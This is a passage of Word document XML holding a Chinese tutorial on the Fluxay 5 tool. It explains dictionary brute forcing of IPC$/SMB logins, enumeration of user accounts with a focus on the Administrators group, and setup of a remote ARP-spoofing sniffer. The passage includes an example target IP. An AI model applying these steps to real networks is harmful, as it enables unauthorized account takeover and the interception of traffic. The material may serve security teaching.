    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>字典可以同时使用多个。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:r w:rsidRPr="003E3E5A">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3547931B" wp14:editId="15E34A07">
            <wp:extent cx="3561905" cy="1133333"/>
            <wp:effectExtent l="0" t="0" r="63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61905" cy="1133333"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3"/>
    <w:p w:rsidR="004056D3" w:rsidRPr="000C025B" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C025B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>开始破解</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>选中的需要破解的项目（包括主机、用户、字典等，确保相应的项目前面的方框中打上对勾），没有打上对勾的项目不会被使用。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3"/>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:r w:rsidRPr="003E3E5A">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4B9BB281" wp14:editId="2F1BCF0A">
            <wp:extent cx="4076190" cy="3466667"/>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6190" cy="3466667"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>简单模式破解：“探测”-“简单模式探测”，简单模式不会使用设置的字典，而是用默认的简单模式字典</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:t>[Setup_dir]\Single.INI</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>标准模式破解：“探测”-“标准模式探测”，在这种模式中，必须设置字典。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IPC（SMB）的破解</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>在通常情况下，</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:t>IPC只须填入主机名称，用户名可以通过枚举得到。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>枚举用户名</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:t>IPC</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>主机所在的树型列表中进行操作，可以具体到某一台主机，例如可以分别单独开始或者停止某一台主机的探测或枚举。例如：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:r w:rsidRPr="003E3E5A">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="58E273BF" wp14:editId="027F3A4F">
            <wp:extent cx="2714625" cy="2494371"/>
            <wp:effectExtent l="0" t="0" r="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1916" cy="2501070"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在上图中，当前选中的只有</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:t>211.161.36.48,那么从菜单选择的命令只对一台主机有效。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>红色标示：表示正在破解（猜测密码）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>绿色标示：表示正在枚举用户</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>黑色标示：没有任何操作正在进行</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果需要对所有主机（</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:t>IPC）进行操作，那么就需要选中”IPC $ Server”</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进行类似的的操作。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:r w:rsidRPr="003E3E5A">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="65ECACF5" wp14:editId="43B41F0E">
            <wp:extent cx="3714286" cy="1828571"/>
            <wp:effectExtent l="0" t="0" r="63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14286" cy="1828571"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="5984" w:type="dxa"/>
        <w:tblCellMar>
          <w:left w:w="0" w:type="dxa"/>
          <w:right w:w="0" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="5984"/>
      </w:tblGrid>
      <w:tr w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidTr="00A749FC">
        <w:trPr>
          <w:trHeight w:val="368"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5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56"/>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Brute User Who Belongs to Administrators: </w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>仅仅破解属于</w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:t>Administrators</w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>组的用户。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidTr="00A749FC">
        <w:trPr>
          <w:trHeight w:val="724"/>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Stop Brute If Get Administrator Successfully: </w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>只要成功破解出一个属于</w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:t>Administrators</w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>组的用户，就停止对此主机的破解。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidTr="00A749FC">
        <w:trPr>
          <w:trHeight w:val="356"/>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Yes]</w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>：在成功获得了用户列表之后，就自动开始破解。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidTr="00A749FC">
        <w:trPr>
          <w:trHeight w:val="368"/>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No]: </w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>不自动开始破解</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidTr="00A749FC">
        <w:trPr>
          <w:trHeight w:val="368"/>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Option]: </w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>选项</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果选择了自动开始破解，即</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:t>[Yes]</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>按纽，那么流光会自动使用密码字典</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:t>[Fluxay_Dir]\IPCSingle.INI</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:r w:rsidRPr="003E3E5A">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="701823B7" wp14:editId="691F1632">
            <wp:extent cx="3419048" cy="2000000"/>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19048" cy="2000000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="5518" w:type="dxa"/>
        <w:tblCellMar>
          <w:left w:w="0" w:type="dxa"/>
          <w:right w:w="0" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="5518"/>
      </w:tblGrid>
      <w:tr w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidTr="00A749FC">
        <w:trPr>
          <w:trHeight w:val="426"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5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414"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5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Emenurate All Users: </w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>枚举所有用户，否则就最多枚举</w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:t>Limited</w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>中指定的用户数</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidTr="00A749FC">
        <w:trPr>
          <w:trHeight w:val="426"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5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Add User From File If Emenurate Has Failed: </w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>如果枚举失败，那么从指定的文件中加入用户列表</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在某些系统中，用户数量非常多，如果枚举所有的用户会非常耗时。所以在网络传输质量不是很好的环境中，不建议枚举所有用户。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IPC破解</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果通过上面的破解没有成功（或者没有选择自动开始破解），那么可以手动开始对</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:t>IPC$</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的破解。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>选中需要探测的主机，从右键菜单中选择</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:t>[Scan]-&gt;All IPC$ Remote Logon</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:r w:rsidRPr="003E3E5A">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="68A35999" wp14:editId="5DB12FD3">
            <wp:extent cx="3980952" cy="2342857"/>
            <wp:effectExtent l="0" t="0" r="635"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980952" cy="2342857"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3"/>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="6330" w:type="dxa"/>
        <w:tblCellMar>
          <w:left w:w="0" w:type="dxa"/>
          <w:right w:w="0" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="6330"/>
      </w:tblGrid>
      <w:tr w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidTr="00A749FC">
        <w:trPr>
          <w:trHeight w:val="710"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6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687"/>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Use Single Burce Mode: </w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>使用简单模式字典进行破解</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidTr="00A749FC">
        <w:trPr>
          <w:trHeight w:val="687"/>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File</w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>：指定一个字典文件进行破解</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidTr="00A749FC">
        <w:trPr>
          <w:trHeight w:val="710"/>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Brute Administrators Only: </w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>仅仅破解属于</w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:t>Administrators</w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>组的用户。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidTr="00A749FC">
        <w:trPr>
          <w:trHeight w:val="1397"/>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lastRenderedPageBreak/>
              <w:t xml:space="preserve">Stop Brute If Get Administrator Successfully: </w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>只要成功破解出一个属于</w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:t>Administrators</w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>组的用户，就停止对此主机的破解</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="003E3E5A">
        <w:t>IPC</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的暴力破解采用了</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:t>SMB/CIFS</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的方式，所以破解成功的密码是没有区分大小写的。例如：对于密码</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:t>Password/password/PASSWORD</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，破解出来的结果都是</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:t>password</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="000C025B" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C025B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>3．网络嗅探</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>流光</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中的嗅探是基于</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:t>ARP Spoof</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的，也就是说可以对大多数交换环境的网络进行嗅探。嗅探也采用了</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:t>C/S</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的结构，即使是对本地的局域网进行嗅探也需要先安装本地嗅探引擎</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="000C025B" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C025B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>连接嗅探主机</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>从菜单</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:t>[Tools]-&gt;Remote Sniffer-&gt;Remote ARP Network Sniffer</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或者按</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:t>ALT+S</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:r w:rsidRPr="003E3E5A">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7184AB68" wp14:editId="09B0BB5B">
            <wp:extent cx="3533333" cy="1466667"/>
            <wp:effectExtent l="0" t="0" r="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33333" cy="1466667"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:r w:rsidRPr="003E3E5A">
        <w:t xml:space="preserve">　</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="6390" w:type="dxa"/>
        <w:tblCellMar>
          <w:left w:w="0" w:type="dxa"/>
          <w:right w:w="0" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="6390"/>
      </w:tblGrid>
      <w:tr w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidTr="00A749FC">
        <w:trPr>
          <w:trHeight w:val="381"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6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369"/>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IP: </w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>安装嗅探引擎的主机，如果是本机则为</w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:t>127.0.0.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidTr="00A749FC">
        <w:trPr>
          <w:trHeight w:val="381"/>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Port</w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>：嗅探引擎监听的端口，默认为</w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:t>1122</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidTr="00A749FC">
        <w:trPr>
          <w:trHeight w:val="369"/>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Passwd: </w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>连接嗅探引擎的密码</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidTr="00A749FC">
        <w:trPr>
          <w:trHeight w:val="381"/>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Work Offline: </w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>不连接主机，进入嗅探界面，此项功能主要用于打开历史嗅探记录。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidTr="00A749FC">
        <w:trPr>
          <w:trHeight w:val="381"/>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Connect: </w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>开始连接指定的嗅探主机</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3"/>
    <w:p w:rsidR="004056D3" w:rsidRPr="000C025B" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C025B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
